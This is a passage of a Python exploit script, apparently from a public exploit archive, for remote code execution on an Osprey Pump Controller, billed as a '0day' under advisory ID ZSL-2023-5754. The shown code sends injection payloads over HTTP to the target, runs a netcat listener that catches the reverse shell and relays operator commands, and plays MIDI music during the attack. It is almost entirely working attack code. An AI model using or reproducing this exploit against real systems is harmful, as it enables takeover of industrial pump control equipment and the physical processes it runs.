self.headers["Content-Type"]="application/x-www-form-urlencoded"                self.postdata={"userName":urllib.parse.unquote(self.payload),                               "pseudonym":"251"}                r=requests.post(self.rhost+url,headers=self.headers,data=self.postdata)                if r.status_code == 200:                    break            else:                print("Trying vector:",url[:-18])                r=requests.get(self.rhost+url+"="+self.payload,headers=self.headers)                print("Code:",r.status_code)                if r.status_code == 200:                    print('Access Granted!')                    break    def netcat(self):        import nclib        server = nclib.TCPServer(("0.0.0.0",int(self.lport)))        print("Operator...?")        server.sock.settimeout(7)        for client in server:            print("You got a call from %s:%d" % client.peer)            command=""            while command!="exit":                if len(command)>0:                    if command in client.readln().decode("utf-8").strip(" "):                        pass                data = client.read_until('$')                print(data.decode("utf-8"), end="")                command = input(" ")                client.writeln(command)            print("Zya!")            exit(1)    def rasplet(self):        if self.sound:            konac1=threading.Thread(name="Pump_Up_The_Jam_1",target=self.entertain)            konac1.start()        konac2=threading.Thread(name="Pump_Up_The_Jam_2",target=self.netcat)        konac2.start()        self.injekcija()    def presh(self):        titl2="""  _______________________________________ /                                       \\|  {###################################}  ||  {##     Osprey Pump Controller    ##}  ||  {##            RCE 0day           ##}  ||  {##                               ##}  ||  {##         ZSL-2023-5754         ##}  ||  {###################################}  ||                                         ||               80  90  100               ||            70     ^      120            ||        60 *      /|\       * 140        ||    55             |              160    ||                   |                     ||                   |                     ||   (O)            (+)              (O)   | \_______________________________________/        """        print(titl2)    def entertain(self):                pygame.midi.init()        midi_output=pygame.midi.Output(0)            notes=[            (74,251),(86,251),(76,251),(88,251),(84,251),(72,251),(69,251),(81,251),            (83,251),(71,251),(67,251),(79,251),(74,251),(62,251),(64,251),(76,251),            (72,251),(60,251),(69,251),(57,251),(59,251),(71,251),(55,251),(67,251),            (62,251),(50,251),(64,251),(52,251),(48,251),(60,251),(57,251),(45,251),            (47,251),(59,251),(45,251),(57,251),(56,251),(44,251),(43,251),(55,251),            (67,251),(43,251),(55,251),(79,251),(71,251),(74,251),(55,251),(59,251),            (62,251),(63,251),(48,251),(64,251),(72,251),(52,251),(55,251),(60,251),            (64,251),(43,251),(55,251),(72,251),(60,251),(64,251),(55,251),(58,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(52,251),(40,251),(72,251),            (76,251),(84,251),(55,251),(60,251),(77,251),(86,251),(74,251),(75,251),            (78,251),(87,251),(79,251),(43,251),(76,251),(88,251),(72,251),(84,251),            (76,251),(60,251),(55,251),(86,251),(74,251),(77,251),(52,251),(88,251),            (79,251),(76,251),(43,251),(83,251),(74,251),(71,251),(86,251),(74,251),            (77,251),(59,251),(53,251),(55,251),(76,251),(84,251),(48,251),(72,251),            (52,251),(55,251),(60,251),(52,251),(55,251),(60,251),(55,251),(59,251),            (62,251),(63,251),(64,251),(48,251),(72,251),(60,251),(52,251),(55,251),            (64,251),(43,251),(55,251),(72,251),(64,251),(55,251),(58,251),(60,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(40,251),(52,251),(72,251),            (51,251),(81,251),(39,251),(69,251),(67,251),(79,251),(72,251),(38,251),            (50,251),(78,251),(66,251),(72,251),(69,251),(81,251),(50,251),(72,251),            (54,251),(57,251),(84,251),(60,251),(76,251),(88,251),(50,251),(74,251),            (86,251),(84,251),(54,251),(57,251),(60,251),(72,251),(69,251),(81,251)]        channel=0        velocity=124        for note, duration in notes:            midi_output.note_on(note, velocity, channel)            duration=59            pygame.time.wait(random.randint(100,301))            pygame.time.wait(duration)            midi_output.note_off(note, velocity, channel)            del midi_output        pygame.midi.quit()    def main(self):        self.propo()        self.rasplet()        exit(1)if __name__=='__main__':    Pump__it__up().main()

Tag

#telnet